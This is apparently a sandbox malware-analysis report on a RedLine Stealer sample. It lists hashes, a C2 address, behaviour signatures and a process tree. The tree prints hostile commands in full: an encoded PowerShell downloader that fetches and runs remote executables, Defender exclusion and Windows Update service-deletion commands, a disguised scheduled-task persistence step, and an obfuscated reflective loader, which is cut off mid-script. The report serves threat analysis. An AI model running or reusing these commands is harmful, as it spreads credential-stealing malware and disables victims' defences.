Analysis

  • max time kernel
    42s
  • max time network
    77s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-02-2023 13:04

General

  • Target

    aa95d6c08ae9201828da23593e42df4a2e39ce82.exe

  • Size

    626KB

  • MD5

    47b01695ff80b03ae518b333163da42c

  • SHA1

    aa95d6c08ae9201828da23593e42df4a2e39ce82

  • SHA256

    474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e

  • SHA512

    886a285e76a7d41e14bb1cfef3a464dc47e4b665bfd6905f26961253fd5f4eee0a6fed01afd464d603c8d17f6d09edc475e2fdd4da79178c6be0f54dc5bad466

  • SSDEEP

    6144:fMEN1L7wFSXZX4KipZx7fuwkBzvGwxAOo8jRfAAfc:f9N1LkFSJX45p3Uhq8jRAAE

Malware Config

Extracted

Family

redline

Botnet

1

C2

107.182.129.73:21733

Attributes
  • auth_value

    3a5bb0917495b4312d052a0b8977d2bb

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:664
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:580
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
            PID:1020
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{1c930b06-3d85-451b-84d4-a59333820e5b}
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4036
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:372
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:944
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
                PID:3464
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                1⤵
                  PID:3304
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                  1⤵
                    PID:3096
                  • C:\Windows\Explorer.EXE
                    C:\Windows\Explorer.EXE
                    1⤵
                      PID:1124
                      • C:\Users\Admin\AppData\Local\Temp\aa95d6c08ae9201828da23593e42df4a2e39ce82.exe
                        "C:\Users\Admin\AppData\Local\Temp\aa95d6c08ae9201828da23593e42df4a2e39ce82.exe"
                        2⤵
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:4984
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1460
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="
                            4⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:472
                            • C:\Users\Admin\AppData\Local\Temp\new2.exe
                              "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:3076
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                6⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3596
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 256
                                6⤵
                                • Program crash
                                PID:820
                            • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                              "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:2224
                            • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                              "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                              5⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:3156
                            • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                              "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3908
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 136
                          3⤵
                          • Program crash
                          PID:4924
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2436
                      • C:\Windows\System32\cmd.exe
                        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1968
                        • C:\Windows\System32\sc.exe
                          sc stop UsoSvc
                          3⤵
                          • Launches sc.exe
                          PID:424
                        • C:\Windows\System32\sc.exe
                          sc stop WaaSMedicSvc
                          3⤵
                          • Launches sc.exe
                          PID:1364
                        • C:\Windows\System32\sc.exe
                          sc stop wuauserv
                          3⤵
                          • Launches sc.exe
                          PID:5100
                        • C:\Windows\System32\sc.exe
                          sc stop bits
                          3⤵
                          • Launches sc.exe
                          PID:4960
                        • C:\Windows\System32\sc.exe
                          sc stop dosvc
                          3⤵
                          • Launches sc.exe
                          PID:1588
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                          3⤵
                            PID:3112
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                            3⤵
                              PID:3736
                            • C:\Windows\System32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                              3⤵
                              • Modifies security service
                              PID:1772
                            • C:\Windows\System32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                              3⤵
                                PID:1624
                              • C:\Windows\System32\reg.exe
                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                3⤵
                                  PID:4924
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3252
                              • C:\Windows\System32\dialer.exe
                                C:\Windows\System32\dialer.exe
                                2⤵
                                  PID:1156
                              • C:\Windows\system32\taskhostw.exe
                                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                1⤵
                                  PID:2912
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                  1⤵
                                    PID:2844
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    1⤵
                                      PID:2808
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                      1⤵
                                        PID:2532
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                        1⤵
                                          PID:2512
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                          1⤵
                                            PID:2480
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                            1⤵
                                              PID:2456
                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                              1⤵
                                                PID:2396
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                1⤵
                                                  PID:2388
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                  1⤵
                                                    PID:2288
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                    1⤵
                                                      PID:2280
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                      1⤵
                                                        PID:2232
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2100
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1712
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:2008
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                              1⤵
                                                                PID:1948
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                1⤵
                                                                  PID:1940
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                  1⤵
                                                                    PID:1932
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                    1⤵
                                                                      PID:1792
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                      1⤵
                                                                        PID:1784
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                        1⤵
                                                                          PID:1652
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                          1⤵
                                                                            PID:1644
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                            1⤵
                                                                              PID:1632
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                              1⤵
                                                                                PID:1572
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                1⤵
                                                                                  PID:1492
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                  1⤵
                                                                                    PID:1408
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                    1⤵
                                                                                      PID:1396
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                      1⤵
                                                                                        PID:1388
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                        1⤵
                                                                                          PID:1344
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                          1⤵
                                                                                            PID:1232
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                            1⤵
                                                                                              PID:1224
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                              1⤵
                                                                                                PID:1144
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                1⤵
                                                                                                  PID:3712
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4984 -ip 4984
                                                                                                    2⤵
                                                                                                      PID:3932
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3076 -ip 3076
                                                                                                      2⤵
                                                                                                        PID:4768
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:3868
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        1⤵
                                                                                                          PID:904
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                          1⤵
                                                                                                            PID:3956
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                            1⤵
                                                                                                              PID:1508
                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:2144
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                1⤵
                                                                                                                  PID:4908
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                  1⤵
                                                                                                                    PID:2856
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                    1⤵
                                                                                                                      PID:1964
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                      1⤵
                                                                                                                        PID:3996
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:3764
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                          1⤵
                                                                                                                            PID:1036
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                            1⤵
                                                                                                                              PID:428
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                              1⤵
                                                                                                                                PID:888
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WOEnkkqxAmKs{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xzSCspegZSwBBG,[Parameter(Position=1)][Type]$KaMRcfTNVS)$ystfuiofova=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+'t'+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+'m'+''+[Char](111)+'ry'+[Char](77)+''+'o'+'du'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+'D'+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+'d'+','+''+'A'+''+[Char](110)+''+'s'+''+'i'+'Cla'+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ystfuiofova.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+'a'+[Char](108)+'Nam'+[Char](101)+''+','+'Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$xzSCspegZSwBBG).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ystfuiofova.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+'e',''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Ne'+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+'a'+''+[Char](108)+'',$KaMRcfTNVS,$xzSCspegZSwBBG).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+'g'+'e'+'d');Write-Output $ystfuiofova.CreateType();}$ufZAuLExtKGAK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+'d'+'l'+[Char](108)+'')}).GetType('M'+'i'+'cr'+'o'+''+[Char](115)+'o'+[Char](102)+''+'t'+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+'3'+[Char](50)+''+[Char](46)+'Un'+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](117)+''+'f'+''+'Z'+''+[Char](65)+'u'+[Char](76)+''+'E'+'xtKGA'+[Char](75)+'');$cLQOVRkpSuFzza=$ufZAuLExtKGAK.GetMethod(''+[Char](99)+''+[Char](76)+''+[Char](81)+''+[Char](79)+'VR'+[Char](107)+''+[Char](112)+'S'+[Char](117)+'F'+[Char](122)+''+'z'+'a',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$anNpwVUcmoZFimiGdxc=WOEnkkqxAmKs @([String])([IntPtr]);$xkuPELcSDciHTOWQQzcBKu=WOEnkkqxAmKs 